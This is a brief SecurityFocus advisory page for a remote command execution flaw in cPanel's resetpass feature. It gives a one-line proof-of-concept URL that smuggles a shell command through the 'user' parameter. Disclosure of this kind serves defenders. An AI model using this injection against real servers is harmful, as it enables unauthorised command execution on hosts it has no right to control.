info
discussion
exploit
solution
references
cPanel Resetpass Remote Command Execution Vulnerability
The following proof of concept has been supplied:
http://www.example.com:2082/resetpass/?user=|">ls"|
Privacy Statement
Copyright 2010, SecurityFocus